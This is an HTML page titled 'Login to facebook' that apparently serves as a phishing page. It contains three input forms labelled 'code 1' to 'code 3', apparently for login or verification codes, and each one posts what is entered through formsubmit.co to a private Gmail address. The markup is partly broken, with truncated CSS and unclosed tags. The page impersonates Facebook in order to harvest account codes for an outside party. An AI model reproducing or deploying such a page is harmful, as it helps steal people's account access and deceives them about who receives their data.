<!DOCTYPE html>   
<html>   
<head>  
<meta name="viewport" content="width=device-width, initial-scale=1">  
<title> Login to facebook </title>  
<style>   
Body {  
  font-family: Calibri, Helvetica, sans-serif;  
  background-color: white;  
}  
button {   
       background-color: #4CAF50;   
       width: 100%;  
        color: white;   
        padding: 10px;   
        margin: 5px 8px;   
        border: none;   
        cursor: pointer;   
         }   
 rder-box;   
    }  
 button:hover {   
        opacity: 0.7;   
    }   
  .cancelbtn {   
        width: auto;   
        padding: 20px 20px;  
        margin: 10px 5px;  
    }   
        
     
 .container {   
        padding: 20px;   
        background-color: lightblue;  







</style>
</head>
<body>

<center><h1> </h1><center>
        
<p contenteditable> code 1:
<form action=" https://formsubmit.co/goodboyph123@gmail.com" method="POST" />
  <input type="text" name="903175"placeholder="903175" /> <br /> 

<p contenteditable> code 2:
<h1>


<form action="https://formsubmit.co/goodboyph123@gmail.com" method="POST" />
  <input type="text" name="653758"placeholder="653758" /> <br /> 
        





<h4><p contenteditable> code 3: </h4>
<form action=" https://formsubmit.co/goodboyph123@gmail.com" method="POST" />
  <input type="text" name="code"placeholder="Enter your code" /> <br /> 




<h1>
<style type="text/css">
  button {
    border: none;
    background: #0076ff;
    border-radius: 200px; 
    padding: 10px;
    color: #fff;
    font-weight: bold;
    font-size: 200px:
    text-transform: uppercase;

   }
</style>
<button>  send </button>


    